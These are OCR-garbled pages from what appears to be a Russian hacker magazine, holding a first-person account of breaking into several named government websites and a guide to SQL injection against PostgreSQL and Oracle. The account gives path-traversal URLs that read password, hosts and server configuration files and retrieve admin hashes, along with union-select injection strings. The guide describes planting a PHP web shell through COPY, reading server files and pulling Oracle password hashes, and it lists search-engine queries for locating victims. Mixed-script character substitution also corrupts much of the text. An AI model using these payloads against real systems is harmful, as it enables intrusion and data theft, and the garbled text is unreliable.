ІР оѵтег: ЫаОіопаІ АегопаиОісз апсі Зрасе 
АззосіаОіоп 

ІР аззідпесі До: ЫаРіопаІ АегопаиРісз апсі 
Зрасе АззосіаОіоп 



> Один из бажных ресурсов в зоне .доѵ.ик 



мол, нетта кого домена. Воттакие дела. Но это все мелочи, 
самое интересное, как говорится, внутри =). 

О Первые баги — первый урожай 

Так-с, с боевой обстановкой ознакомились, пора приступать 
кактивным действиям. Но прежде я хочу предупредить, что 
сознательно не буду до конца раскручивать большую часть 
указанных мной уязвимостей. 

Начнем, пожалуй, ста кой страны, как Макао. Находится она, кста- 
ти, в Азии, но не в этом суть. Гуляя в очередной раз по просторам 
Сети, я наткнулся на любопытный ресурс ѵѵѵѵѵѵ. тасаи .дгапсіргіх. 
доѵ.то . Сайт, насколько я понял, был посвящен гонкам. Честно 
говоря, я не силен в местных иероглифах, поэтому мой взгляд от 
контента стал медленно смещаться в сторону адресной строки. 
Тут-то я и заметил, что ресурсик располагается в правительс- 
твенной доменной зоне Макао (.доѵ.то). Этот факт показался мне 
достаточно интересным, ия решил ненадолго задержаться на 
портале =). Фотки и прочая лабуда меня мало привлекали, но вот 
один из линков натренированный глаз заметил сразу: 

ТШОр : / /ѵішя . тасаи . дгапсіргіх . доѵ .то/шдрс/ 
риЫіс_1тОт1/дЬ/таіп . рКр?саД=петл/з&іОет=тдр 
с&1і1е=з]го^_пе^з . рЬр&іс1=1741 

Да-да,ты правильно догадался, параметр Іііе вскрипте 
таіп.рбр действительно не фильтровал входящие значения. 
Несмотря на то что еггог_герогбпд(), по-видимому, был в 
нуле, через пару секунд я уже читал файл раззѵѵсі, успешно 
слитый с сервера :). Я зашел на ѵѵѵѵѵѵ.сІотаіпзсІЬ.пеі . вбил 
урл госресурса Макао, и меня послали идти лесом, сообщив, 
что никакой информации по этому домену нет :(. Однако 
ни какого труда не составило прочитать местный Ьозіз: 




> Крайне не реко- 
мендую связываться 
с правительствен- 
ными ресурсами 
и нарушать их 
работоспособность. 

В противном случае 
можешь начинать 
собираться в места 
не столь отдаленные. 




>Внимание! Инфор- 
мация предоставле- 
на исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 



«НЕТРУДНО ДОГАДАТЬСЯ, ЧТО НИ ОДИН ХУИЗ-СЕРВИС 
НЕ ДАСТ НАМ ПОЛНОЙ ИНФОРМАЦИИ ПО ПРАВИТЕЛЬС- 
ТВЕННЫМ ИЛИ ВОЕННЫМ ДОМЕНАМ» 



Хотя, на самом деле, на основном сервере ЫА5А далеко не 
один домен (о чем я упоминал в своей статье «ЫА5А.Ѳ0Ѵ 
на коленях» — читай подшивку «Хакера»). А по запросу 
«ѵѵѵѵѵѵ. па ѵу. тіі» сервис ОотаіпзОВ и вовсе отвечает, что, 



АЦЦр : / /тт . тасаи . дгапсіргіх . доѵ . то/тдрс / 
риЫіс_Ыст1/дЬ/таіп . р!ір?са1:=пеѵ\/з&і1іет= 
тдрс&1і1е= . ./. ./. ./. ./. ./. ./. ./. . /еДс/ 
ІюзДз 
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> Дырявое казначейство Малайзии :) 



> Читаем файлы на сервере сиднейского руководства 



Ответ не заставил себя долго ждать: 

# Бо поБ гетоѵе БЬе Боііотпд Ііпе, 
ог ѵагіоиз ргодгатз # БкаБ гесдиіге 
пеШогк кипе О і опа 1і Бу ѵгііі Баіі. 

127.0. 0.1 др .тасаи . дгапсіргіх. 
доѵ.то ІосаІБюзБ ІосаІБюзБ. 
Іосаісіотаіп др тт. тасаи. 
дгапсіргіх . доѵ . то #192.168.1.28 
ѵлам . тасаи . дгапсіргіх . доѵ . то 

Какоказалось, на сервере крутился Ыпих: 

Ьіпих ѵегзіоп 2.6.17-1 . 2142_ 

ЕС4зтр (Ыісотрі1е@]зз2 0-Ьс1- 
4 .Ъиіісі. гесІЬаБ . сот) (дсс ѵегзіоп 

4.0. 2 20051125 (Кесі НаБ 4 . 0 . 2-8 ) ) 

#1 8МР Тие Биі 11 22:57: 02 ЕБТ 2006 

И через минутуу меня в рукахуже находился 
конфиг Апача: 

ЬББр : / /ъплпл/ . тасаи . дгапсіргіх . 
доѵ . то/тдрс/риЫіс_ЬБт1 
/дЬ/таіп . ркр?саБ = пеѵ\/з&іБет=тд 
рс&Бі1е=. ./. ./. ./. ./. ./. ./. . 

/ . . /еБс/ЬББрсі/сопБ/ЬББрсІ. сопі 

Виртуальных хостов на сервере найдено не 
было, зато я обнаружил полезную для себя диру: 
/ехрогѴИоте/ЬіІризег/ѴѴеЬМазІіег/. Поиграв 
с параметрами, я таки выудил хэши пассов 
админов: 

ЬББр : / /шт . тасаи . дгапсіргіх . доѵ . 
то/тдрс/риЫіс_ЬБт1 /дЬ/таіп . 
рЪр?саБ=пеѵ\гз&іБет=тдрс&Бі1е= . . 

/ ехрогБ/ 



Бюте/ЬББризег/ШеЬМазБег/ . 
дрра з з ѵ\го гсі& і с1= 3 9 4 

Самое интересное, чтотутбыл не один хэш: 

МеЪМазБег: Бк0ЕЬепССКХз2 
рЬртуасІтіп : сІЗ д В0р9РуББСс асітіп:/ 
ЫБкН . БТ7КСІС 

Воттебе и админ, и веб-мастер и пхпмайад- 
мин =). Паролики, естественно, были рас- 
шифрованы, но выкладывать я их не буду :). 
Все в твоих руках. Кстати, админка лежит 
тут: ѵѵѵѵѵѵ.ппасаи.дгапбргіх.доѵ.ппо/абппіп . 
Продолжаем двигаться дальше. Следующие 
на очереди — турки. 

Честно говоря, мне никогда не нравился 
турецкий андеграунд с обилием кидисов. 
Поэтому от вида турецкого ресурса, находя- 
щегося в правительственной доменной зоне, 
во мне сразу проснулся азарт =).Самлинкна 
сайт был таким: ѵѵѵѵѵѵ.аіат.доѵ.іг . Побродив по 
ссылкам, я наткнулся на инъекцию: 

кББр : / /шт. аБат. доѵ. Бг/іпсіех . рЪр? 
Раде=БегдіІсегік&Ісегік№э=-1%27 

Скриптіпбех.рЬр работал с базой и был подвер- 
жен вцСинъекции, что не могло не радовать :). 
Поиграв с конструкцией «огбег Ьу», я таки 
узнал количество полей: 

кББр : / /шт. аБат. доѵ. Бг/іпсіех. 
ркр?Раде=БегдіІсегік&ІсегікЫо=- 
І + огсІег+Ьу+5/* 

Как выяснилось, данные со второго и пятого 
полей отображались: 



кББр : //ѵлалѵ. аБат. доѵ. Бг/іпсіех . 
ркр?Раде=БегдіІсегік&ІсегікБо=- 
1+ипіоп+зе1есБ+1 , 2 , 3 , 4 , 5/* 

Ксожалению, на мою попытку получить доступ 
к тузді.изегз база ругнулась и выдала лишь: 
«Ассезз бепіеб Іог изег: , а1:апп^ВЙ[оса[Ьо51: , Іо 
баіабазе 'тузді'». Название одной таблички 
я знал: йегдіісепк. Также я знал и названия 
полей в ней: N 0 , ТРВазІік, ТРУагаг, ТРОегдіЗауі, 
ТРІсегік. Но ничего полезного там не обнаружи- 
лось. Прав РІе_ргіѵтоже не было, и все попытки 
прочитать какой-либо из файлов на сервере 
были тщетны. Но когда я глянул версию Му501_, 
мое лицо расплылось вулыбке: 

кББр : / /ѵгтя . аБат. доѵ. Бг/іпсіех. 
ркр?Раде=БегдіІсегік&ІсегікЫо=- 
1+ипіоп+зе1есБ+1 , ѵегзіоп ( ) ,3,4, 
5+Бгот+БегдіІсегік/* 

На сервере крутился «мускул» версии 4.0.26. Как 
и с чем его едят, думаю, разберешься и без меня 
— я и тактебе уже многое сказал =). 

Так, кто там на очереди? Ах, Малайзия, а я 
уж и забыл :). Между прочем, не сайтец, а 
золото, почти в прямом смысле. Спешу пред- 
ставитьтебе официальный ресурс казна- 
чейства Министерства финансов Малайзии: 
ѵѵѵѵѵѵТгеазигу.доѵ.ту . Кстати, дизайн у этого 
портала достаточно качественный, чего 
не скажешь о движке. Достаточно прогу- 
ляться по следующему линку, чтобы в этом 
убедиться: 

кББр : / /ѵгтя . Бгеазигу . доѵ. ту/ 
Іпс1ех.р1ір?ск=3 6&рд=12 6&ас=183 0 
%27 



«ТАК, КТО ТАМ НА ОЧЕРЕДИ? АХ, МАЛАЙЗИЯ, А Я УЖ И 
ЗАБЫЛ :). МЕЖДУ ПРОЧИМ, НЕ САЙТЕЦ, А ЗОЛОТО, ПОЧТИ 
В ПРЯМОМ СМЫСЛЕ» 
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> Важный ресурс в зоне .доѵ.іг 




«СОВЕРШЕННО СЛУЧАЙНО МНЕ НА ГЛАЗА ПОПАЛСЯ 
ОДИН ИЗ ИХ РЕСУРСОВ В ЗОНЕ .60Ѵ.ІЖ, И ТОТ ОКАЗАЛ 
СЯ ВАЖНЫМ» 



В качестве ответа — пустой лист, что говорит об 
еггог_герогііпд(0) и, следовательно, о слепой 
инъекции. Нуда это нам не помеха :). Если ты 
читал мою статью в «Хакере» под названием 
«Недетский взлом» (февраль, 2007), то уже 
наверняка понял, что кчему. Полей оказалось 
всего 1 1 : 

ТЩЦр : / /ѵгтя . Дгеазигу . доѵ.шу/ 
іпсіех . рЬр?сЪ=3 6&рд=12 6&ас=183 0% 
27+огс1ег+Ьу+11/* 

Но что самое интересное, в этом же скрипте не 
фильтровалась еще одна переменная — $рд. 
Результат тот же: 

ЫсДр: //ъплпл/. Ргеазигу . доѵ.шу /іпсіех . 

ркр?сЪ=37&рд=129%27+огс1ег+Ъу+11/ 

*&ас=1892&1апд=епд 

Что-то мне подсказывает, что у малазийского 
казначейства могут возникнуть нехилые про- 
блемы =). Только смотри не шали сильно — как 
показывает практика, шутки могутзакончиться 
плохо. 

Ну а мы тем временем перемещаемся в сторо- 
ну солнечной Австралии. Гм, а что ты вообще 
знаешь об Австралии? :) Кенгуру, теннис, 
пляжи? =) Слабовато, а ведьтам еще и бажные 
ресурсы в зоне .доѵ.аи есть :). Сил ьно углуб- 
ляться не будем, поэтому коротко и по делу. 
Первый наш клиент — Департамент туризма 
и искусства Тасмании, а второй — сидней- 
ское руководство чего-то там. Ресурс Департа- 



мента туризма Тасмании выглядит даже очень 
неплохо, правда только снаружи : 
ѵѵѵѵѵѵ.ЫсепіепагѵТаз.доѵ.аи . Двиг написан на РНР, 
а сама бага лежит практически на поверхности: 

ТШДр: //ѵллм.ЪісепРепагу.Раз.доѵ. 
аи/раде . рЬр?іс1=-1+огс1ег+Ьу+15/* 

Причем тут можно наблюдать и ответ «мускула». 
Например, поменяв в верхнем запросе циферку 
1 5 на 1 6, получим ожидаемый результат: 

МуЗОЬ Еггог: 1054 (ТЗпкпоѵ/п соіишп 
'16' іп 1 огсіег сіаизе ' ) 

Суть баги понятна, так что флаг тебе в руки =). 
Что касается сиднейского руководства чего-то 
там, то его портал порадовал своим дырявым 
перловым движком. Сам домен имеет адрес 
\ллллл/.5са.п5\л/. доѵ.аи . Ауязвимость кроется в 
скрипте Іехіѵегзіоп.рі. В общем виде это 
выглядит так: 

ІЩДр : / /ѵтѵі. зса . пзм. доѵ. аи/сді- 
Ьіп/РехЦѵегзіоп/ЦехРѵегзіоп. 
р1?сопі=сопі . хш1&іі1е= 
еДс/раззж! 

Очень солидно смотрится бага, просто супер =). 
Маленькая подсказка: конфиг веб-сервера ле- 
жит неподалеку, но на самом сервере интерес- 
ного мало. Воттакие дела, еще раз передаю 
привет солнечной Австралии =). 

И в заключение скажу пару слов о 



Великобритании. Совершенно случайно 
мне на глаза попался один из их ресурсов 
взоне .доѵ.ик, и тот оказался бажным. Урл 
портала: ѵѵѵѵѵѵ.топіІог-пЬзД.доѵ.ик . Чтобы 
ты сил ьно не мучался, намекну, что уязвим 
скрипт риЫісаііопз.рЬр, инъекция раскручи- 
вается через нефильтруемый параметр сак 

ЪЩкр: / /ѵпш. топіЦог-пДзіЦ .доѵ.ик/ 
риЫісакіопз . рДр?сак = -1 ' 

Полей всего 19: 

Ыскр: //ѵ^ълѵ.топіког-пЬзіІі . доѵ. 
ик/риЫісакіопз . р1ір?саЦ = -1+ипіо 
п+зеІеск+1,2,3,4,5,6,7,8,9,10,1 
1,12,13,14,15,16,17,18,19/* 

А версия «мускула» — 4.1 .16 =). Как говорится, 
без комментариев. 

О Постскриптум 

Надеюсь, что после прочтения моей статьи 
все твои иллюзии о несокрушимости 
правительственных ресурсов развеются. 
Любой взлом — это, в первую очередь, дело 
времени и желания. Проблема лишь в том, 
что, связавшись с подобными серверами, 
ты непременно наживешь себе лишний 
геморрой. Я не зря не раскручивал до конца 
описанные баги. Тебе тоже не советую это 
делать. Не надо трогать государство, тем 
более свое — оно может укусить, очень 
больно укусить. □с 
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Разрушая базы 



ПРОВЕДЕНИЕ 50ЫШЕСТІ0Ы В Р05Т6РЕ5СИ. И ОРАСІ.Е 



Всем наверняка знакомо сочетание «зці-ігуесгіоп». Не раз и не два мы вытягивали нуж- 
ные сведения из таблиц баз данных. В то же время далеко не всегда удается провести 
успешную инъекцию из-за незнания особенностей той или иной базы данных. В общих 
чертах синтаксис АИ51 5(3 Ь везде одинаков, но существуют подводные камни. 



О Это тебе не «мускул» 

В большинстве случаев уязвимое приложение 
взаимодействуете МуЗОБ, но, кроме «мускула», 
довольно популярными являются серверы баз 
данных М550Б, Огасіе и РозІдгеЗОБ. Писать 
про все три мы не будем — информации по теме 
инъекций в серверы, использующие СУБД 
М550Б, более чем достаточно. Сегодня мы на 
практических примерах рассмотрим некоторые 
тонкости при взломе РозідгеЗОБ и Огасіе. Учти, 
что никто не собирается обучать тебя языку 
структурированных запросов ЗОБ. 

□ Десять «святых заповедей» 

РозІдгеЗО Б — достаточно мощная система, адми- 
нистрировать которую труднее, чем МуЗОБ. Как 
правило, ее используют на крупных коммерческих 
проектах, требующих сложной иерархической 



структуры базы данных. Но вто же время РозІдгеЗОБ 
тяжелая и работает медленнее, чем тотже «мускул», 
п оэто му в р я д л и кто -то будет и с п ол ьз о вать эту СУ БД 
для домашней страницы (хотя в нашейжизни все 
возможно). Чтобы всетвои инъекции был и успеш- 
ными, усвой десять простых правил. Ноучти, чтоони 
характерны только для РозідгеЗОБ. 

1. В отличие от МуЗОБ, в базах данных 
РозідгеЗОБ количество полей в зеіесі-запросах 
может не совпадать. Следовательно, здесь нам 
не нужно подбирать количество полей, какэто 
бывает в МуЗОБ. 

Пример: запрос «Ьіір://сІиЬ.*****.ги/?рагі_ 
ісМ Ощеіесі 1 1 ** 1 » равнозначен «Ыір:// 
сІ иЬ .*****. Ги / ? р аГ Н С |= 1 ОщеІесИ ,2/**/». 

2 . Таблицы МуіаЫе и туіаЫе не равнозначны. 
Всегда следует учитывать регистр букв. 

3. Нельзя оставлять открытый комментарий. 



Следовательно, отсечь ненужный нам зці-за- 
прос просто так не получится. Но есть простой 
выход — использование пиіі-байта «%00» (при 
отсутствии фильтрации). 

Запрос: 

Ьіір://сІиЬ. *****. ги/?рагНб=1 0-1/* 

ВЫВОД: 

Раіаіеггог: Саіііо ипсіеііпесі іипсііоп: іеісНгоѵѵО 
іп /ѵаг/ѵѵѵѵѵѵ/НісІосз/ѵегезк-СІиЬ/сІаззез/ЗОБ. 
сіазз.рбр оп Ііпе 25 

Запрос: 

Ыір://сІиЬ. *****. ги/?рагНсІ=1 0-1/**/ 

Вывод: 

Страница сайта. 
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> Возможности программы С055 




>М055ОиіггеІ_ в действии 



4. Для записи данных из файла втаблицу или наоборот, из 
таблицы в файл в РоБідгеЗСЫ, используется оператор СОРУ. 
Вотего синтаксис, взятый из документации: 

СОРУ ІаЫепаше [ ( соіишп [ , . . . ] ) ] 

ТО { 1 Тііепате 1 I ЗТБОІІТ } 

[ [ ШТН ] 

[ ВШАКУ ] 

[ ОІБЗ ] 

[ БЕЫМІТЕК [ АЗ ] ' (ІеІІШІСег 1 ] 

[ ШЬЬ [ АЗ ] ’пиіі зЕгіпд' ] ] 

При копировании данных из табл и цы в файл все просто: 

со ру іа гд еііа Ыеіо '/Нот е/ѵѵѵѵѵѵ/' ; со ру. 

Для получения шелла в полетаблицы іагдеііаЫе, естественно, 
должен быть прописан код, создающий шелл (пример запроса: 
іп5егііпіо«іагдеііаЫе"(соІитппате)ѵаІие5('<?рЬр5у5іет($_ 
бЕТГстсі"]); ?>’);). Поле соіитппате должно иметь строковой 
тип (сИаг, ѵагсЬаг). Единственное «но» — нужны соответствующие 
права записи в файл и записи в директорию. Либо можно попы- 
таться перезаписатьуже существующий файл. Далее мы просто 
обращаемся к сайту напрямую, поскольку зада на ѴѴѴѴѴѴ-директо- 
рия (в примере). В общем, тугмного вариантов, можно, к примеру, 
еще и проапдейтить таблицу своими значениями (ІІРОАТЕ). 

Если же нужно копировать существующий файл втаблицу, то 
последовательность действий должна быть следующей. Со- 
здаем новую таблицу содним столбцом, выполняем запрос, 
копирующий файл втаблицу. Затем выполняем запрос для 
выбора данных из таблицы. 

Сами запросы по порядку: 

сгеаіе іаЫе туіаЫе(соІитппате); 

сгеаіе іаЫе сору туіаЫе (соіитппате) ігот ѴЬотеАлллл/ѵ/ііІе' 
ипіоп веіесі сиіитппате ігот «туіаЫе» 

5. Числа 0 и 1 не равнозначны булевым значениям ТРІІЕ и 
БАББЕ. Об этом свидетельствует и сам ответ сервера. 

Запрос: 

Ыір ://с1иЬ. *****. ги/?рагі_іб=1 0 ог 1 

ВЫВОД: 

ѴѴагпіпд: рд_диегу(): Оиегу іаііесі: ЕРРОР: АгдитепіоіогтиБі 
Ьеіуре Ьооіеап, поі іуре ІЫедегіп ѵаг/ѵѵѵѵѵѵ/ЫсІос5/ѵеге5к_ 
сІиЬ/сІаввев/ЗОЕ.сІавв.рбр оп Ііпе 25 

Еаіаіеггог: Саіііо ипбеііпеб іипсііоп: іеісЬго\л/() іп/ѵаг/ѵѵѵѵѵѵ/ 
Ьібос5/ѵегеБк_сІиЬ/сІа55еБ/50Е.сІаБ5.рЬр оп Ііпе 25 



Запрос: 

Ыір ://сІиЬ. *****. ги/?рагі_ісі=1 0 огТРІІЕ 

Вывод: 

Страница сайта. 

Запрос«Ыір://сІиЬ.*****.ги/?рагі_ісІ=1 0 апб ТРІІЕ=ТРІІЕ» 
успешно выполнится, а « Ыір ://сІиЬ. *****. ги/?рагі_ісі=1 0 апб 
ТРІІЕ=1 » нет. 

6. Все зеіесі-запросы разделяются точкой с запятой, нона 
выходе мы наблюдаем результат только последнего запро- 
са. То есть использование «ядовитого нуля» обязательно. 

Запрос: 

Ыір://сІиЬ. *****. ги/?рагі_ісі=1 Ощеіесі 1/**/ 

Вывод: 

Страница сайта. 




> Если хочется 
протестировать 
утилиты БВ Аисііі 
и МбББОшггеБ.то 
их всегда можно 
скачать с официал ь- 
н ых са йтов — ѵѵѵѵѵѵ. 
БоііігееіесИ.сот и 
ѵѵѵѵѵѵ. пд 55 оііѵѵаге. 
сот . Правда, 
для скачивания 
последней утилиты 
придется 

зарегистрироваться. 



7. Ограничение доступа никто не отменял, поэтому для 
записи в файл нужны соответствующие права. Нужно 
создать новый файл в доступной нам по правам 
папке или писать в другой файл, также доступный 
пользователю, под которым запущен РоБідгеБОБ. 

8. Функция сЬг() возвращает А5СІ 1-код символа. Но ее ис- 
пользование связано с некоторой сложностью, поскольку 
функция принимает и возвращаеттолько один символ. 
Для получения кода целой строки придется вызывать 
отдельную функцию для каждого символа и в последствии 
объединять. 

Пример: 

Строка «123». 



а N 




V У 

>На дискеты 
найдешь последние 
версии РоБідгеЗСЫ 
и Огасіе, а также 
интересные книги по 
структуре СУБД. 



Кодирование: 

сЬг(1 )| |сЬг(2)| ІсЬг(З) 



9. Текущего пользователя можно узнать, вызвав функцию 
ІІзегП, а версию — используя функцию ѵегзіопО. 

10. Вырубить сервер всегда можно с помощью 
простой инструкции бішісіоѵѵп (при соответствующих 
правах). 

О Все намного проще... 

В начале этого повествования я не успел обрадовать читате- 
ля и упомянуть о том, что извлечь данные из РозідгеЗОЕ при 
определенных обстоятельствах намного легче, чем изтойже 
МуЗСЫ. 
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Как правило, информация извлекается одной из 

двух возможных функций: рд Ре1;с И О Ь] есі: и рд_ 

{ебеЬ_аггау(). Если используется первая функция, то 
придется явноуказывать имя нужного нам столбца 
втаблице. рд_РеІс Ь_0 Ь] есі возвращает объект, а не 
массив. В очередной раз проводя аналогию ^мус- 
кулом», отмечу, что здесь не нужно знать порядок 
столбцов, требуется лишь наименование. 
Получение объекта РозІдгеЗСИ с помощью 
рд_Реісб_ОЬІесі реализуется простым 
РНР-сценарием: 

<?рЪр 

$бабаЪазе = "ѵегіад" ; 

$с1Ъ_сопп = рд_соппесб 
( " іосаібюзб " , "5432", 

$бабаЪазе) ; 

іб ( ! $бб>_сопп) : ?> 

<Н1>Ошибка соединения с базой 
<? есбю $бабаЪазе ?></Н1> <? 

ехіб ; 
епбі б ; 

$ди = рд_ехес ($бЪ_сопп, "ЗЕЬЕСТ 
* ЕЕОМ ѵегіад ОЕБЕЕ БУ аибог" ) ; 

$гсж =0; // РозбдгеЗОЬ необхо- 
дим счетчик записей, в отличие от 
других СУБД 

тлДііІе ($баба = рд_бебсй_оЬз есб 
( $ди , $готл/) ) : 

есбю $баба->аибог . " ( " ; 
есбю $баба->заЪ.г . " ) : " ; 
есбю $баба->бібе1 . "<ВК>" ; 



$гоъ/+ + ; 
епбѵіЬіІеі 
?><РКЕ><? 

$біе1бз[] = Аггау ("аибог", 

" Аиббюг " ) ; 

$біе1бз[] = Аггау ( " д аЪг " , " 

Уеаг " ) ; 

$біе1бз[] = Аггау («бібеі", " 

Тібіе" ) ; 

$гоъ/= 0; // РозбдгеЗОЬ необхо- 
дим счетчик записей, в отличие от 
других СУБД 

ѵбЬііе ($баба = рд_бебсбі_обд есб 
( $ди, $гом) ) : 

гезеб ($біе1бз); 
ѵбЬііе (Іізб (,$ібеш) = еасй 
($біеібз) ) : 

есбю $ібеш[1] . " : " . $баба- 
>$ібет[0] . " \п" ; 
епбжЬііе; 

$гоіл/+ + ; 
епсЫЬііе; 

?></РКЕ> 

Если же используется функция рд_бебсЬ_а ггауО , 
то нам нетребуется точное имя столбца, 
порядковый номер, единственное, что нужно, 

— общее число столбцов втаблице. Дело втом, 
что эта функция, как и рд_бебсИ_гоѵѵ() , хранит 
результат за проса под числовыми индексами в 
массиве. 

Пример применения рд бебсЬ а ггауО : 



<? рйр 

$сопп = рд_рсоппесб 
( "бЬпате=риЫіз1іег " ) ; 
іб ( ! $сопп) { 

есбю "Ап еггог оссигеб . \п" ; 
ехіб ; 

} 

$гези1б = рд_диегу ($сопп, 

" ЗЕЬЕСТ * ЕКОМ аибЬогз " ) ; 
іб ( ! $гези1б ) { 
есбю "Ап еггог оссигеб . \п" ; 
ехіб ; 

} 

$агг = рд_бебсбі_аггау ($гезиіб, 

0, РСЗ<2Ь_ШШ) ; 

есбю $агг[0] . " <- аггау\п" ; 

$агг = рд_бебсбі_аггау ($гезиіб, 

1, РСЗОЬ_АЗЗОС) ; 

есбю $агг [ "аиббюг " ] . " <- аггау \ 
п" ; 

?> 

□ Идентификация 

При проведении атаки типа вді-іщесііоп взлом- 
щик первым делом определяет сервер базы 
данных, с которым придется проводить пос- 
ледующие манипуляции. В МуЗОб все просто: 
подставил кавычку в запрос, ну или, в крайнем 
случае, составил логическое выражение — по- 
лучил ошибку. Чтобы точно определить, что мы 
взаимодействуем с РозбдгеБОЕ, нужно ввести в 
запрос специальные операторы или функции, 
присутствующие исключительно в Роз1:дге5СІЕ. 
Выделим основные. 

Операторы: 

I/— квадратный корень; 

!! — префиксный оператор; 

! — факториал; 

% — остаток отделения; 

Л — возведение в степень; 

II/— кубический корень. 

Функции: 

зідпО — знак числа, переданного в качестве 
аргумента; 

с Ь гб ( ) — кубический корень числа, передавае- 
мого в качестве аргумента. 

Если мы получаем пустую страницу или шаблон 
страницы загружается без динамического со- 
держимого, то будьуверен — это РозідгеЗОЕ. 

□ В поисках цели 

Примечательно, что сайты с уязвимыми скрип- 
тами достаточно просто найти через боодіе. Для 
этого есть несколько запросов: 

1. РозідгеЗСИдиегу ба і ІесІ : ЕРРОР: рагзег: рагзе 
еггог 
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> На официальном сайте можно найти много полезной информации 



2. Зиррііесі агдитепі із поі а ѵаіісі Роз^дгеЗОЬ 
гезиіі 

3. ѴѴагпіпд: рд_ехес() [^ипсііоп.рд-ехес]: Оиегу 
ІаііесІ 

Перечислять все коды ошибокздесь не имеет 
смысла. Полезнее обратиться кдокументации 
( ѵѵѵѵѵѵ.ро5ідге5д[.огд/бос5 ). 

Немного отойдя оттемы, напомню, что по- 
исковик боодіе является не только удобным 
средством для обнаружения потенциальной 
жертвы, но и «историей болезни» многих 
порталов, поскольку использует кэширование ;). 
Зачастую уязвимые скрипты, которые заме- 
няются новыми, пропатченными, остаются на 
сервере. Найти их поможет веб-архив 
[ ѵѵѵѵѵѵ.ѵѵеЬ.агсЫѵе.огд ]. Заходим, вбиваем ад- 
рес нужного нам сайта, находим все доступные 
скрипты и по очереди выясняем их наличие 
на сервере. Если таковые обнаруживаются, то 
проверяем на уязвимости. Здесь мы выполня- 
ем простое сканирование. Да — примитивно, 
да — долго, но это последнее, на что следует 
идти, если другие решения не найдены. 

□ Явление Огасіе 

Про Огасіе есть несколько оченьхороших 
статей, ссылки на которыеты найдешь далее, 
поэтому я упомяну л ишь основные моменты: 

1. Идентификация СУБД аналогична определе- 
нию Роз^дгеЗОБ. 



2 . Возможно выполнениетакихзапросов, как 
ІЫ5ЕРТ, ОЕБЕТЕ, ІІРОАТЕ. 

3. Использовать Іітіі, какты это делал в МуЗОБ, 
в Огасіе не получится. Вместо этого используй 
іп (1,2). 

4 . Подстановка нулей ( N и II) не сработает для 
поля типа іпіедег, используй еетолько для стро- 
кового поля. 

5 . Одной из самых серьезных ошибок при 
администрировании Огасіе является исполь- 
зование пользователя с максимальными 
правами (йВЗЫМР), и естественно, возможный 
взломщик может внедрять свои запросы, имея 
максимальные права. 

6. Использование разделения выражений 
символом «;» невозможно. 

7 . Узнать схему СУБД Огасіе можно несколькими 
способами: «зеіесі ивегігот биаі», «зеіесі: пате 
Ігот Ѵ$0АТАВА5Е», «зеіесі ЗОН ЕМАЫАМ Е !гот 
ѵ$зеззіоп» или «зеіесі зуз.Іодіп_изег1гот зуз. 
биаі». Зашифрованный пароль (необратимый 
хэш, генерируемый из пары «юзер && пароль») 
узнается запросом «зеіесі РАЗЗѴѴОРй Ігот 
бЬа_изегз или зеіесі РА55ѴѴ0Р0 Ігот изег_ 
изегз». Версия — запросом «зеіесі ѴЕР5 1 0 N 
Ігот ѴфІЫЗТАКІСЕ», аккаунты пользователей 

— «зеіесі * Ігот 5уз.бЬа_изег5». 

8. Используются стандартные комментарии 
(«-»). 

9. Вместо пробелов можно использовать 
кавычки. 



Пример: «зеІесГизегпа те"1гот"зу5». «б Ьа_изе 
Г5"\л/Иеге"и5егпате"= , 5у5'» 

10 . Кодирование в АЗСІІ-символ происходит 
также, как и в РозІдгеЗОБ, — с помощью функ- 
ции сЬг(). 

11. Для конкатенации используются пайпы 

(«II»). 

12 . Сайты с бажными скриптами легко ищутся в 
поисковике: «О РА-0092 1 : ипехресіеб епб оІЗОБ 
соттапб». 

□А какже автоматизация? 

Пропарсивсдесятокстраницпоисковика, я на- 
шел всего несколько специализированныхутилит 
для атаки и аудита СУБД Огасіе (всевозможные 
сканеры безопасности не в счет). Это програм- 
ма МОЗЗОиіггеБот компании Ыехі Оепегаііоп 
ЗесигіІуЗоІІѵѵагедулза БВ АибіІотЗоІіТгее и мно- 
гим уже знакомая русскоязычная утилита Сопзоіе 
Огасіе ЗесигіІуЗсаппегот Бітріб Вуіе. Первая 
и вторая программы подойдут для аудита собс- 
твенного сервера науязвимости, но никакнедля 
удаленного анализа системы с целью последую- 
щего проникновения. Поэтому выбор очевиден 
— 0055. С помощью этой утилиты можноузнать 
версию Огасіе и другую полезную информацию 
(5Ю, например), выполнять команды, брутить 
на стандартные аккаунты ит.д. Исходники, к сожа- 
лению, не прилагаются. 

□ Новости с фронта 

Во время написания этой статьи в багтраке поя- 
вилась информация об уязвимостях, найденных 
в РозІдгеЗОБ (7.4) и Огасіе (9і/1 Од). В обоих 
случаях — зді-іщесііоп. 

В случае с РозІдгеЗОБуязвим модуль сопігіб/ 
1зеагсЬ2 при объявлении некоторых функций. В 
Огасіе же все намного серьезнее — 4 дыры и 4 
эксплойта ( Ыір://хакер.ги/розі/36944/бе1аиІБазр ). 

□ Занавес 

Я описал лишьосновы основ возможностей в 
Огасіе и РозІдгеЗОБ. Есть гораздо более слож- 
ные структурные атаки, требующие глубоких 
знаний р д 5 О Б/ Р Б и всехтонкостей вышеназ- 
ванных СУБД. И если ты имеешь соответству- 
ющую подготовку, то я советую тебе прочесть 
интересный доклад ОаѵісГа БіІеЫіеІсГа «Огасіе 
РБ/50Б Іщесііоп» и статью СЬгіз'а АЫеу’я 
«(Моге) Абѵапсеб 50Б Іщесііоп», которые можно 
скачать с моей домашней страницы или взять 
на диске. □С 
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ІЖЗТАВЬЕ 



иМ5ТАВЬЕ@ЫС5.КУ / 



Сито для воздуха 

ИЗУЧЕНИЕ ТРАФИКА ѴѴІ-РІ СЕТИ 



Здравствуй, мой маленький любитель стафа и вареза из беспроводных сетей! Надоело 
просто юзать бесплатный интернет, хочется пойти дальше? Ну что ж, пойдем дальше 
— к сбору трафика ѴѴі-Рі. «А если не можем подключиться?» — спросишь ты. А это нам и 
не надо Не веришь? А зря, очень зря. Это реально и, что самое смешное, это не просто, 
а очень просто, хотя прямые руки все равно лишними не будут, равно как трезвый мозг 
и рабочий комп. Итак, сегодня мы поговорим о том, чем снифать воздух, как это делать 
правильно, чем удобен этот способ хака, а также рассмотрим несколько хитростей. 



□ Снифанем по маленькой 

Что же такое «снифинг» и с чем его едят? 
Сейчас я, поидее, должен начать разгла- 
гольствовать оснифингеи сниферах, о том, 
как прикольно, что все это есть, и как круты 
те, кто все это придумал. Да, молодцы, а мы 
сегодня будем пожинать плоды ихтруда. 
